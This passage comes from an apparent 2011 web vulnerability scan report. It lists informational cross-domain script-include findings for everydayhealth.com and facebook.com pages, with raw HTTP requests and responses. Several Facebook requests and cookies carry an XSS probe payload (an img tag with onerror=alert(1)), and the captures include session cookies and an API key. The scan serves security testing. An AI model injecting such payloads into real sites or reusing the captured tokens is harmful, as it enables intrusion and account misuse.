Content-Type: text/html; charset=utf-8
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...
<!-- FM STAMP Pushdown 970x66 Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/2555'></script>
...[SNIP]...
<!-- FM Leaderboard Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/936'></script>
...[SNIP]...

17.11. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://cdn.gigya.com/js/socialize.js?apiKey=2_8EfdkImERrOXsR0bxPbzwQ5_9X4rmkUc8lqP8duGovaXunCtSz4As4J5Q4Su2fUg
  • http://connect.facebook.net/en_US/all.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://platform.twitter.com/widgets.js
  • http://tracking.waterfrontmedia.com/GCScript.ashx?p=37

Request

GET /allergy/climate-change-and-allergies.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:31 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO4hyeM5MDY2ODIwZC0xMWZhLTRjODktOGQzNS03NzFlZGNmNzhkODY1; expires=Wed, 13-Jul-2011 21:36:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ahsac155xnki2v55pzjexlmb; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49105


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx" />

<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script language="javascript" type="text/javascript" src='http://tracking.waterfrontmedia.com/GCScript.ashx?p=37'></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- socialize.js script should only be included once -->
<script type="text/javascript" src="http://cdn.gigya.com/js/socialize.js?apiKey=2_8EfdkImERrOXsR0bxPbzwQ5_9X4rmkUc8lqP8duGovaXunCtSz4As4J5Q4Su2fUg"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

17.12. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://cdn.gigya.com/js/socialize.js?apiKey=2_8EfdkImERrOXsR0bxPbzwQ5_9X4rmkUc8lqP8duGovaXunCtSz4As4J5Q4Su2fUg
  • http://connect.facebook.net/en_US/all.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://platform.twitter.com/widgets.js
  • http://tracking.waterfrontmedia.com/GCScript.ashx?p=37

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO6Y*xNkN2I5MjVjYi05YzUzLTRhY2MtYjcwOC03ZmQxMjAzMTMxNGU1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=esw2jyaebe5e2r55rhgfig45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49627


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx" />

<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script language="javascript" type="text/javascript" src='http://tracking.waterfrontmedia.com/GCScript.ashx?p=37'></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- socialize.js script should only be included once -->
<script type="text/javascript" src="http://cdn.gigya.com/js/socialize.js?apiKey=2_8EfdkImERrOXsR0bxPbzwQ5_9X4rmkUc8lqP8duGovaXunCtSz4As4J5Q4Su2fUg"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

17.13. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://cdn.gigya.com/js/socialize.js?apiKey=2_8EfdkImERrOXsR0bxPbzwQ5_9X4rmkUc8lqP8duGovaXunCtSz4As4J5Q4Su2fUg
  • http://connect.facebook.net/en_US/all.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://platform.twitter.com/widgets.js
  • http://tracking.waterfrontmedia.com/GCScript.ashx?p=37

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO7eIwsxNDRhNTExOC0xODcxLTQwN2ItYmNjOS1kZDk5OTdlYTE1N2I1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ytmqve451nrbiy55ltp0oe55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48908


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx" />

<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script language="javascript" type="text/javascript" src='http://tracking.waterfrontmedia.com/GCScript.ashx?p=37'></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- socialize.js script should only be included once -->
<script type="text/javascript" src="http://cdn.gigya.com/js/socialize.js?apiKey=2_8EfdkImERrOXsR0bxPbzwQ5_9X4rmkUc8lqP8duGovaXunCtSz4As4J5Q4Su2fUg"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

17.14. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://cdn.gigya.com/js/socialize.js?apiKey=2_8EfdkImERrOXsR0bxPbzwQ5_9X4rmkUc8lqP8duGovaXunCtSz4As4J5Q4Su2fUg
  • http://connect.facebook.net/en_US/all.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://platform.twitter.com/widgets.js
  • http://tracking.waterfrontmedia.com/GCScript.ashx?p=37

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:33 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO9S9eM0ZDUxYzkzYi0zMDJmLTQwYmYtOTcwNC1mNDg4N2I4MDBiZmM1; expires=Wed, 13-Jul-2011 21:36:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tew4lhmlby1awfarbc5plyur; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47316


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx" />

<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script language="javascript" type="text/javascript" src='http://tracking.waterfrontmedia.com/GCScript.ashx?p=37'></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- socialize.js script should only be included once -->
<script type="text/javascript" src="http://cdn.gigya.com/js/socialize.js?apiKey=2_8EfdkImERrOXsR0bxPbzwQ5_9X4rmkUc8lqP8duGovaXunCtSz4As4J5Q4Su2fUg"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

17.15. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.16. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/11
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=hrTlo; path=/; domain=.facebook.com
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.40.55
X-Cnection: close
Date: Thu, 05 May 2011 11:29:43 GMT
Content-Length: 11493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.17. http://www.facebook.com/10000082482078341583

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.31
Connection: close
Date: Thu, 05 May 2011 11:43:13 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.18. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.55
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 11470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.19. http://www.facebook.com/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; wd=1022x1007

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.96.57
X-Cnection: close
Date: Thu, 05 May 2011 11:56:38 GMT
Content-Length: 11260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.20. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; wd=1022x1007

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.102.67
X-Cnection: close
Date: Thu, 05 May 2011 11:56:26 GMT
Content-Length: 11478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.21. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.67
Connection: close
Date: Thu, 05 May 2011 11:40:11 GMT
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.22. http://www.facebook.com/AOLrealestate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /AOLrealestate

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

